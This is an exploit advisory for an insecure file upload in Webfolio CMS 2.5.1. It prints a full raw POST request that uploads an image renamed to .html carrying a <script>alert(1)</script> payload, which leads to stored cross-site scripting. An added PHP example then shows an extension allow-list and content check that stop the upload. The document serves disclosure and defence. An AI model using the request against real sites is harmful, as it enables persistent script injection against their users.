`# Exploit Title: Insecure File Upload in Webfolio 2.5.1
# Date: 04 August 2015
# Exploit Author: Sharankumar somana
# Vendor Homepage: http://webfolio-cms.sourceforge.net/
# Software Link: http://sourceforge.net/projects/webfolio-cms/?source=typ_redirect
# Version: 2.5.1
# Tested on: Windows 7
_________________________________________________________________________________________________________________________
Insecure File Upload
Webfolio CMS is vulnerable to insecure file upload. The application checks the size and content type of files during upload, but it fails to check the extension of the uploaded file. A malicious user can successfully upload a valid image file with JavaScript embedded in it by changing the extension to html. An attacker can take advantage of this issue to perform persistent cross-site scripting attacks.
Raw Request:
POST /webfolio/wfcms2/admin/users/edit/1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://localhost/webfolio/wfcms2/admin/users/edit/1
Cookie: PHPSESSID=fp7drdbohoi5v1ni242iuoq303;
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------17740215416001
Content-Length: 123677

-----------------------------17740215416001
Content-Disposition: form-data; name="UserAccountInfo[username]"

admin
-----------------------------17740215416001
Content-Disposition: form-data; name="UserAccountInfo[password]"


-----------------------------17740215416001
Content-Disposition: form-data; name="UserAccountInfo[passwdConfirm]"


-----------------------------17740215416001
Content-Disposition: form-data; name="UserAccountInfo[email]"

[email protected]
-----------------------------17740215416001
Content-Disposition: form-data; name="UserAccountInfo[role]"

10
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[realName]"

sharan
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[aboutText]"

testing 123
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[dateOfBirth]"

1990-08-04
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[picture]"; filename="test.html"
Content-Type: image/jpeg

Valid image file data followed by javascript code
<html>
<script>alert(1)</script>
</html>
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[picture][current_file_name]"

php1678_55bfc11748cdf.html
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[timeZone]"

UTC
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[website]"


-----------------------------17740215416001
Content-Disposition: form-data; name="_csrf"

af184c6a94f8485fae50c8e5bc320695
-----------------------------17740215416001
Content-Disposition: form-data; name="btnSave"

Save changes
-----------------------------17740215416001--
`
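The missing extension check described above, sketched server-side as an added example (this is not Webfolio's code or the advisory author's). The function name `safeStoredName`, its parameters, and the sample bytes are assumptions made for illustration; it relies on PHP's fileinfo extension.

```php
<?php
// Added example, not Webfolio's code. The sample input is constructed to
// mirror the picture part of the request shown in the advisory.

// Detected MIME type => the only extension a stored file of that type may have.
const IMAGE_TYPES = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

/**
 * Decide the name to store an uploaded picture under, or null to reject it.
 * $clientName is the filename="" value from the request (hypothetical parameter),
 * $bytes is the uploaded content. The request's Content-Type header is
 * deliberately not an input: the client controls it.
 */
function safeStoredName(string $clientName, string $bytes): ?string
{
    // 1. Extension allow-list: the check the advisory reports as missing.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    $ext = ($ext === 'jpeg') ? 'jpg' : $ext;
    if (!in_array($ext, IMAGE_TYPES, true)) {
        return null;
    }
    // 2. Type detected from the bytes themselves (fileinfo extension).
    $mime = (string) (new finfo(FILEINFO_MIME_TYPE))->buffer($bytes);
    // 3. The extension must be the one that belongs to the detected type.
    if ((IMAGE_TYPES[$mime] ?? null) !== $ext) {
        return null;
    }
    // 4. Server-generated name: nothing from the client reaches the file system.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample: JPEG header bytes followed by markup, as in the advisory.
$polyglot = "\xFF\xD8\xFF\xE0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
          . "<html><script>alert(1)</script></html>";

var_dump(safeStoredName('test.html', $polyglot));   // fails step 1 (extension)
var_dump(safeStoredName('avatar.png', $polyglot));  // fails step 3 (bytes are JPEG)
var_dump(safeStoredName('avatar.jpg', $polyglot));  // passes, stored under a random .jpg name
```

The last call passes by design: content sniffing cannot tell that markup follows the image header, so the protection comes from the stored extension, which decides the type the web server serves the file as. Re-encoding the image on upload and sending `X-Content-Type-Options: nosniff` remove the trailing payload and the browser's ability to reinterpret it.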